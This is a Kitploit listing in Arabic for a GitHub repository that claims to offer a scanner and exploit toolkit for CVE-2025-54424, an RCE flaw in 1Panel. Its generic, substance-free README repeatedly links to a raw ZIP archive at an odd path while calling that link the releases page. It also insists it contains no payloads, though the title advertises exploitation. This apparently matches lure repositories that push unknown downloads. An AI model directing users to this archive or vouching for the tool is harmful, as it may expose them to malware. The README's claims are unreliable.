Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-54424 — CVE-2025-54424: تجاوز شهادة عميل TLS في 1Panel يتيح تنفيذ الكود عن بُعد (RCE) عبر CN مزيّفة 'panel_client' باستخدام أداة فحص واستغلال مدمجة. الإصدارات المتأثرة: <= v2.0.5. 🔐 | Kitploit
أدوات/GitHubGitHub/hophtien/cve-2025-54424
ماسحات الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubhophtien/cve-2025-54424

CVE-2025-54424

CVE-2025-54424: تجاوز شهادة عميل TLS في 1Panel يتيح تنفيذ الكود عن بُعد (RCE) عبر CN مزيّفة 'panel_client' باستخدام أداة فحص واستغلال مدمجة. الإصدارات المتأثرة: <= v2.0.5. 🔐

عرض المستودع
31منذ 14س 41دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip

CVE-2025-54424: ماسح RCE لـ 1Panel ومجموعة أدوات اختبار آمنة للمختبرات

Releases

CVE-2025-54424 هي ثغرة تتعلق بـ 1Panel، وتتضمن تجاوز شهادة العميل مما قد يؤدي إلى تنفيذ أوامر عن بُعد. يوفر هذا المستودع مجموعة أدوات متكاملة تهدف إلى مساعدة الباحثين في إجراء الفحص والاختبارات التحققية لهذه الثغرة في بيئات تجريبية خاضعة للتحكم. تؤكد الأداة على الاختبار الأمني والاستخدامات التعليمية وبحوث الامتثال على الأنظمة المتأثرة. لا يوفر المشروع حمولات هجومية أو نصوص استغلال للوصول غير المصرح به أو لاستهداف الأصول الخارجية. يُرجى استخدامها في بيئات حاصلة على تفويض صريح، والالتزام بالقوانين المحلية ومتطلبات الامتثال في القطاع.

جدول المحتويات

  • حول هذا المستودع
  • أهداف المشروع ونطاقه
  • قواعد الاستخدام والأخلاقيات
  • نظرة عامة على الميزات
  • كيف يعمل (بنية عالية المستوى)
  • نقاط الأمان والحماية
  • متطلبات البيئة والتثبيت
  • البدء السريع (عملية عالية المستوى)
  • أنماط الاستخدام وسير العمل
  • دليل المطورين
  • الاختبار وضمان الجودة
  • الإصدارات والنشر
  • دليل المساهمة
  • الأسئلة الشائعة
  • الترخيص والتفويض
  • شكر وتقدير

حول هذا المستودع هذه مجموعة أدوات موجهة للباحثين ومهندسي الأمان، صُممت حول العمل البحثي الخاص بـ CVE-2025-54424. الهدف الأساسي هو توفير بيئة اختبار شفافة وقابلة لإعادة الإنتاج لتقييم نطاق التأثير، وتحديد العوامل التكوينية، وتقييم فعالية خطط الإصلاح في بيئة خاضعة للتحكم. يؤكد المشروع على عمليات الاختبار الموثقة، وسجلات النتائج القابلة للتتبع، والعمليات الحمائية للأصول.

أهداف المشروع ونطاقه

  • توفير إطار اختبار واضح لإجراء أبحاث أمنية على إصدارات 1Panel ذات الصلة بشرط الحصول على تفويض.
  • توفير مكونات مرتبطة بالاستكشاف والتقييم، دون تضمين حمولات استغلال للأصول الخارجية، أو نصوص برمجية مسلحة، أو تنفيذ مباشر يحاكي الهجمات.
  • تمكين الباحثين من إعادة إنتاج عملية اكتشاف الثغرة في بيئة مختبرية خاضعة للتحكم، وتقييم فعالية التصحيحات وتغييرات الإعدادات، وتنظيم النتائج في تقارير تقييم أمني قابلة للمشاركة.
  • دعم الإعدادات المحلية وتسجيل السجلات وتصدير النتائج لتسهيل التدقيق والاستخدام المتوافق مع اللوائح.
  • توفير سجل تغييرات واضح وملاحظات إصدار لضمان قدرة الباحثين على تتبع تطور الإصدارات.

قواعد الاستخدام والأخلاقيات

  • يُستخدم هذا المشروع فقط في بيئات ذات تفويض صريح. إجراء اختبارات أمنية على أنظمة الآخرين دون إذن يُعد مخالفًا للقانون.
  • لا تُقدَّم حمولات أو نصوص برمجية أو تفاصيل تقنية تُستخدم في الوصول غير المصرح به أو الاستغلال أو الانتشار.
  • قيّم المخاطر قبل الاستخدام، وتأكد من وجود خطة استرجاع ونسخ احتياطية وخطة طوارئ للأعطال.
  • عالج بيانات الاختبار بأمان، وتجنب تسريب المعلومات الحساسة في البيئات العامة.
  • إذا اكتشفت نقاط تحسين محتملة أو اقتراحات إصلاح، فقدمها عبر عملية المساهمة الرسمية، وتجنب نشر المعلومات الحساسة في القنوات العامة.

نظرة عامة على الميزات

  • وحدة الفحص الأمني (مستوى عالٍ): إجراء فحوصات ثابتة وديناميكية على إعدادات 1Panel وإدارة الشهادات وسلاسل الثقة الخاصة بالشهادات في بيئة خاضعة للتحكم، لتحديد مؤشرات المخاطر الأمنية المحتملة.
  • تقييم المخاطر والتقارير: إنشاء تقارير تقييم أمني قابلة للقراءة بناءً على نتائج الفحص، تتضمن مستويات المخاطر، وتوصيات الإصلاح، وترتيب الأولويات، وسلاسل أدلة قابلة للتتبع.
  • قوالب إرشادية لاختبار الأمان: توفير قوالب نصوص اختبار ونماذج تسجيل وتنسيقات أرشفة نتائج لتنفيذها في بيئة المختبر، لمساعدة الباحثين على الحفاظ على الاتساق.
  • مركزية الإعدادات: قوالب إعدادات وأمثلة مركزية لتسهيل إعادة إنتاج سيناريوهات الاختبار في بيئات تجريبية مختلفة.
  • السجلات وسلسلة الأدلة: آلية منهجية لتسجيل السجلات، لتسهيل التدقيق وإعادة الإنتاج ومشاركة نتائج التقييم.

كيف يعمل (بنية عالية المستوى)

  • طبقات المكونات الأساسية: طبقة الواجهة (CLI/واجهة بسيطة) + طبقة محرك الاختبار (حالات الاختبار، harness الاختبار) + طبقة التقارير (تجميع النتائج، التصدير).
  • تدفق البيانات: إدخال الإعدادات والأصول المستهدفة → الفحص والتقييم → تجميع النتائج وتصديرها → إخراج التقرير.
  • الحدود الأمنية: تُنفَّذ جميع الاختبارات في بيئة معزولة، مع تقييد الوصول إلى نظام الملفات والشبكة، ولا تُخزَّن مخرجات الاختبار إلا محليًا أو ضمن نطاق التفويض.
  • اقتران منخفض بين الوحدات: تتواصل الوحدات عبر واجهات واضحة، مما يسهل استبدال أو توسيع أو تعطيل وظائف محددة.

نقاط الأمان والحماية

  • مبدأ البيئة الخاضعة للتحكم: التشغيل فقط في مختبر اختبار أو صندوق رمل (Sandbox)، وتجنب التأثير على أنظمة الإنتاج.
  • مبدأ الامتيازات الأقل: تمتلك حسابات الاختبار الصلاحيات اللازمة فقط، مع تجنب العمليات الخطرة لرفع الصلاحيات.
  • إدارة السجلات والأدلة: تسجيل سجلات منظم، لضمان قابلية التتبع والتدقيق والامتثال لمتطلبات حماية البيانات.
  • تصنيف المخاطر والتخفيف منها: تحديد أولويات الإصلاح للعناصر عالية الخطورة المكتشفة، وتوفير استراتيجيات تخفيف قابلة للتنفيذ.
  • الامتثال والإفصاح: الحصول على التفويض ومسار الإفصاح المناسب قبل الكشف في الأبحاث العامة، مع الالتزام بمبادئ الإفصاح المسؤول.

متطلبات البيئة والتثبيت

  • نظام التشغيل: يمكن استخدام أنظمة Linux/Windows/macOS الرئيسية في بيئات افتراضية، لكن يُنصح بإجراء الاختبارات المختبرية في بيئة Linux.
  • إصدار بايثون (عند الاقتضاء): Python 3.10+ أو بيئة التشغيل المقابلة، مع تلبية التبعيات.
  • إدارة التبعيات: يمكن استخدام بيئة افتراضية (مثل virtualenv أو conda) لعزل التبعيات.
  • متطلبات الشبكة: تُنفَّذ الاختبارات داخل بيئة خاضعة للتحكم، مع ضمان عدم وجود حلقات ارتجاع خارجية أو وصول شبكة غير مصرح به.
  • متطلبات الموارد: تعتمد على حجم الاختبار، ويجب أن تتوفر في بيئة المختبر العادية سعة معقولة من المعالج والذاكرة والتخزين لدعم إنشاء السجلات والتقارير.

خطوات التثبيت (مستوى عالٍ)

  • استنساخ المستودع محليًا.
  • إنشاء بيئة افتراضية وتثبيت التبعيات.
  • ضبط معلمات بيئة الاختبار (مثل الأصول المستهدفة، ومعلمات محاكاة الشهادات، ومستوى السجلات، وغيرها).
  • تشغيل سير عمل الاختبار مع متابعة المخرجات وإنتاج التقارير.

البدء السريع (عملية عالية المستوى)

  • الخطوة الأولى: تجهيز التفويض والبيئة المعزولة. تأكد من أن هدف الاختبار هو أصل مملوك لك أو نظام مفوض. أنشئ أو اختر بيئة تجريبية معزولة، مع ضمان عدم وجود اتصالات خارجية مزعجة.
  • الخطوة الثانية: الحصول والإعداد. نزّل قالب إعداد الاختبار أو احصل عليه، وخصّصه وفقًا لاحتياجات المختبر. سجّل نطاق الاختبار والأهداف والجدول الزمني وخطة الاسترجاع.
  • الخطوة الثالثة: تنفيذ الاختبار. شغّل سير عمل اختبار الأمان، وتابع تقدم الاختبار، وسجّل المخرجات الوسيطة والسجلات والنتائج المرحلية.
  • الخطوة الرابعة: التحليل والتقرير. اجمع نتائج الاختبار، وأنشئ تقرير تقييم أمني، مع تحديد إجراءات الإصلاح وأولوياتها.
  • الخطوة الخامسة: إعادة الاختبار والتحقق. أعد تنفيذ الاختبارات بعد إتمام الإصلاحات للتحقق من فعالية التغييرات، وسجل النتائج المقارنة.
  • الخطوة السادسة: الأرشفة والمشاركة. نظّم النتائج في مواد تقييم قابلة لإعادة الإنتاج، وقم بالإفصاح والأرشفة وفقًا لمتطلبات المؤسسة.

أنماط الاستخدام وسير العمل

  • وضع الفحص: يعتمد على الفحوصات الثابتة والديناميكية، مع التركيز على إدارة الشهادات وسلاسل الثقة ومسارات المصادقة ونقاط تعرض الإعدادات وغيرها من مؤشرات المخاطر عالية المستوى. يُخرج تقريرًا أساسيًا لمساعدة الفرق على فهم الوضع الحالي.
  • وضع التقييم: بناءً على نتائج الفحص، يتم تصنيف المخاطر وتحليل الأسباب وتنظيم توصيات التخفيف. مع التركيز على قابلية التنفيذ والتتبع.
  • إخراج التقارير: إنشاء ملفات قابلة للتصدير لتسهيل المشاركة مع فرق الأمان والتطوير والامتثال. يتضمن التقرير لقطات أدلة ومستويات مخاطر وتوصيات إصلاح وتقييمًا لصعوبة التنفيذ.
  • الامتثال والحوكمة: توفير قوالب عمليات لمساعدة الفرق على إدراج أنشطة الاختبار ضمن أطر مراجعة الامتثال وإدارة التغييرات وحوكمة المخاطر.

دليل المطورين

  • نظرة عامة على بنية الكود: الوحدات الأساسية، والإعدادات والمدخلات، ومحرك الاختبار، والمخرجات والتقارير، وتكامل سلسلة الأدوات، وغيرها.
  • عملية المساهمة: يُرجى تتبع المشكلات عبر Issue وتقديم التغييرات عبر Pull Request. تأكد من اتساق أسلوب الكود، وتوفير تغطية اختبارية وتحديثات للتوثيق.
  • استراتيجية الاختبار: التركيز على قابلية إعادة الإنتاج والاستقلالية. يجب تضمين أمثلة تشغيلية دنيا وبيانات اختبار ومتطلبات بيئية، لضمان قدرة الآخرين على إعادة إنتاج النتائج في الظروف نفسها.
  • التصميم الأمني: يجب أن يتجنب التنفيذ كشف تفاصيل استغلال خارجية. ينبغي وضع علامات واضحة على الأجزاء الحساسة في الكود، مع توفير ضوابط وصول وفصل للوظائف التي قد يساء استخدامها.
  • التبعيات والتوافق: توثيق التبعيات الخارجية الرئيسية وقيود الإصدارات، لتسهيل الصيانة والنشر السريع.

الاختبار وضمان الجودة

  • الفحص الثابت: استخدام أدوات تحليل الكود الثابت لاكتشاف المشكلات المحتملة.
  • الاختبار الديناميكي: تنفيذ اختبارات وظيفية أساسية في بيئة خاضعة للتحكم، للتحقق من تنسيق المخرجات واستقرارها.
  • اختبار الانحدار: تشغيل حالات الانحدار بعد كل تغيير، لضمان عدم كسر التعديلات الجديدة للسلوك القائم.
  • التقييم الأمني: إجراء مراجعة مستقلة للوظائف المضافة حديثًا، لضمان عدم إدخال مخاطر أمنية غير ضرورية.
  • التسجيل والتدقيق: يجب أن تتضمن جميع أنشطة الاختبار سجلات قابلة للتتبع مع طوابع زمنية، لتسهيل التدقيق وإعادة الإنتاج.

الإصدارات والنشر

  • تسمية الإصدارات: اتباع مبادئ التحكم الدلالي في الإصدارات (Semantic Versioning) لتسهيل تتبع التغييرات.
  • ملاحظات الإصدار: يجب أن يتضمن كل إصدار ملخصًا للتغييرات ونطاق التأثير والمشكلات المعروفة ومعلومات التوافق وملاحظات الترقية.
  • الحصول على الإصدارات: يُرجى زيارة صفحة الإصدارات في المستودع للحصول على الإصدارات المتاحة والوثائق ذات الصلة. راجع صفحة الإصدارات على https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip

تفاصيل الإصدارات والنشر

  • التوافق: توضيح الأنظمة وإصدارات 1Panel المتأثرة.
  • انتقال التوافق: في حال وجود تغييرات في API، ينبغي توفير دليل انتقال واضح.
  • استراتيجية الاسترجاع: توفير إرشادات وأدوات للعودة إلى إصدار سابق عند تعذر استخدام الإصدار الجديد.

دليل المساهمة

  • كيفية المشاركة: نرحب بالإبلاغ عن المشكلات، وتقديم الإصلاحات، وتحسين الوثائق والأمثلة. يرجى اتباع أسلوب الكود والمعايير الأمنية للمشروع.
  • أسلوب الكود: حافظ على الوضوح والإيجاز وكفاية التعليقات. تجنب كشف تفاصيل تنفيذ السلوكيات الخطرة.
  • الإفصاح الأمني: تقتصر المحتويات المتعلقة بالتحقق من الثغرات على مواد البيئة المختبرية المصرح بها. يرجى اتباع عملية الإفصاح المسؤول.

الأسئلة الشائعة

  • هل تهاجم هذه الأداة الهدف مباشرة؟ الإجابة: تركز هذه الأداة على الاختبار والتقييم الأمني في بيئة خاضعة للتحكم، ولا تتضمن حمولات استغلال للأصول الخارجية. يجب إجراء الاختبارات فقط ضمن نطاق التفويض.
  • هل يمكنني استخدامها في بيئة الإنتاج؟ الإجابة: لا. يُرجى استخدامها في بيئة اختبار معزولة، وإكمال تقييم المخاطر وإدارة التغييرات قبل النشر في البيئة الفعلية.
  • كيف أحصل على المساعدة؟ الإجابة: أرسل مشكلتك عبر نظام تتبع المشكلات، مع إرفاق خطوات إعادة الإنتاج ومعلومات البيئة والنتائج المتوقعة، لتسهيل الفهم والمساعدة.

الترخيص والتفويض

  • نوع الترخيص: رخصة MIT (وصف توضيحي، والمرجع الفعلي هو ملف LICENSE في المستودع).
  • الاستخدام المصرح به: يُستخدم ضمن نطاق التفويض فقط، ولا يجوز استخدامه في اختبارات أو هجمات غير مصرح بها.
  • الالتزام بالمصدر المفتوح: يلتزم المشروع بروح المصدر المفتوح، ويرحب بمشاركة المجتمع والتحسينات الشفافة.

شكر وتقدير

  • نشكر المشاركين والمراجعين والزملاء الذين ساهموا في الأبحاث الأمنية. جهودكم تساهم في رفع مستوى الأمان العام في القطاع.

إذا كنت بحاجة إلى الاطلاع على عناصر الإصدار المحددة والملفات التي تم تنزيلها والمزيد من أمثلة الإعدادات، يرجى زيارة الرابط التالي والاطلاع على الوثائق ذات الصلة عند الحاجة. راجع صفحة الإصدارات على https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip

ملاحظات

  • يستهدف ملف README هذا الأبحاث الأمنية والاختبارات المتوافقة مع اللوائح، ويؤكد على العمل ضمن نطاق التفويض.
  • لا تُقدَّم تفاصيل استغلال أو محتويات تنفيذية يمكن استخدامها مباشرة في الهجمات، لتجنب تشجيع السلوكيات غير المصرح بها.
  • إذا كانت لديك استفسارات حول الغرض من هذا المستودع أو طريقة التنفيذ أو الخطط المستقبلية، يرجى طرحها عبر قنوات التواصل الرسمية.
تنزيل الأداة